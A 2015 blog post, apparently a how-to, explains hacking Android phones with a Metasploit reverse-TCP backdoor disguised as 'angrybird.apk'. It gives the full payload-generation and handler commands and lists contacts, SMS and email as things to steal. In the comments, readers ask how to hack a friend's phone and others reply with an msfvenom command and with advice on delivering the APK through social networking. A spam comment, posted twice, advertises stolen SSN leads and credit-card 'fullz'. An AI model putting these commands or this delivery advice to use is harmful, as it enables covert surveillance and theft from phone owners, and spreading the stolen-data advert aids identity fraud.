SHUBHAM KANSARA

Just For Hacking: HACKING ANDROID DEVICE USING METASPLOIT BACKDOORS

Wednesday 6 May 2015

HACKING ANDROID DEVICE USING METASPLOIT BACKDOORS






INTRODUCTION       
Metasploit is an open source penetration testing tool with different functionality. Metasploit project provides information about security vulnerabilities useful in penetration testing, develop and exploit remote machines and IPS/IDS signature development.

Note: In this Tutorial I Use my gionee m2. This backdoor will work on all 
           android OS's irrespective of its customisation.

SETUP INFORMATION

192.168.0.3     victim ip Address(Gionee m2)
19.168.0.5       Attackers ip Address(Metasploit)


As it is a demo I am using google drive to download the metasploit backdoor(malicious App).


CREATE BACKDOOR

Using kali linux  with metasploit framework install to generate the payload.


  • msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.5 LPORT=4488 R > angrybird.apk


msfpayload    metasploit command to create payload(exe,apk,java etc)

LHOST            (local host) Attakers ip Address for victim to connect back

LPORT            (local port)port for victim to connect back

R                     msfpayload parameter indicates generation of raw payload

   



successful execution of msfpayload will create angrybird.apk app which is a metasploit reverse tcp backdoor. When the app is installed on  any android device,it will connect back to attackers ip address(192.169.0.5 here).

Before installing the app on your device attacker need to run the following metasploit  commands for succesful connection back to victim's machine to attacker's machine.


  • msfconsole







  • use exploit/multi/handler 
  • set payload android/meterpreter/reverse_tcp
  • set LHOST <attackers_ip_address>
  • set LPORT <connect_back_port>
  • exploit


when the malicious apk running on target device the metasploit's meterpreter shell open. For meterpreter command help type 'help' on meterpreter prompt.
Once the user is compromised  we can accelerate our privileges,make the backdoor persistent,steal contacts,SMS,email etc.

                                             THANX FOR YOUR PATIENT
Posted by at

15 comments:

  1. Adhao22 July 2015 at 13:22

    This comment has been removed by a blog administrator.

    ReplyDelete
    Replies
    1. Spam Leads29 June 2020 at 14:05

      Hey Guys !

      USA Fresh & Verified SSN Leads AVAILABLE with best connectivity
      All Leads have genuine & valid information

      **HEADERS IN LEADS**
      First Name | Last Name | SSN | Dob | DL Number |Address | State | City | Zip | Phone Number | Account Number | Bank Name

      *Price for SSN lead $2
      *You can ask for sample before any deal
      *If anyone buy in bulk, we can negotiate
      *Sampling is just for serious buyers

      ==>ACTIVE & FRESH CC FULLZ ALSO AVAILABLE<==
      ->$5 PER EACH

      ->Hope for the long term deal
      ->Interested buyers will be welcome

      **Contact 24/7**
      Whatsapp > +923172721122
      Email > leads.sellers1212@gmail.com
      Telegram > @leadsupplier
      ICQ > 752822040

      Delete
  2. Unknown2 January 2016 at 09:00

    sir,when i write-----msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.5 LPORT=4488 R > angrybird.apk-----on kali linux 2.0
    messege shown cammand not found i tried many times but failed please tell me the reason of this problem
    thanks
    reply me as soon as possible

    ReplyDelete
    Replies
    1. Test10 January 2016 at 06:45

      you can use this command :-

      msfvenom -p android/meterpreter/reverse_tcp LHOST=system_ip_address LPORT=4444 R > abcd.apk

      Delete
    2. Unknown28 January 2016 at 06:04

      sir i need your help how to create the backdoor apk.......sir

      Delete
  3. Unknown28 January 2016 at 06:39

    sir i have one more help...... if i want to hack my friend phone means .... at that place which ip address i want type here???? frined ip or my ip .......... please hlp me....

    ReplyDelete
  4. Unknown8 February 2016 at 05:03

    Great Post!

    A meterpreter is the best way to hack devices

    ReplyDelete
  5. Unknown28 May 2016 at 16:44

    soo how do you get the spacific device you want?, how do you get it on there phone ?

    ReplyDelete
  6. Devil11 June 2016 at 22:42

    Send the apk file through cloudsend and send the download link to target phone through social networking or something!

    ReplyDelete
  7. Unknown10 October 2016 at 09:18

    This comment has been removed by the author.

    ReplyDelete
    Replies
    1. Unknown11 October 2016 at 08:47

      sir i did the same but after this
      (started reverse TCP handler on ip :4444
      starting the payload handler )

      nothing happen

      Delete
    2. Unknown11 October 2016 at 08:47

      plzzzzzzz answer me

      Delete
  8. Unknown9 December 2016 at 09:11

    not connect

    ReplyDelete
  9. Unknown18 January 2017 at 05:57

    can u help me exactly in the process for hacking an android over WAN ??

    ReplyDelete
  10. Spam Leads29 June 2020 at 14:05

    Hey Guys !

    USA Fresh & Verified SSN Leads AVAILABLE with best connectivity
    All Leads have genuine & valid information

    **HEADERS IN LEADS**
    First Name | Last Name | SSN | Dob | DL Number |Address | State | City | Zip | Phone Number | Account Number | Bank Name

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ==>ACTIVE & FRESH CC FULLZ ALSO AVAILABLE<==
    ->$5 PER EACH

    ->Hope for the long term deal
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete

Subscribe to: Post Comments (Atom)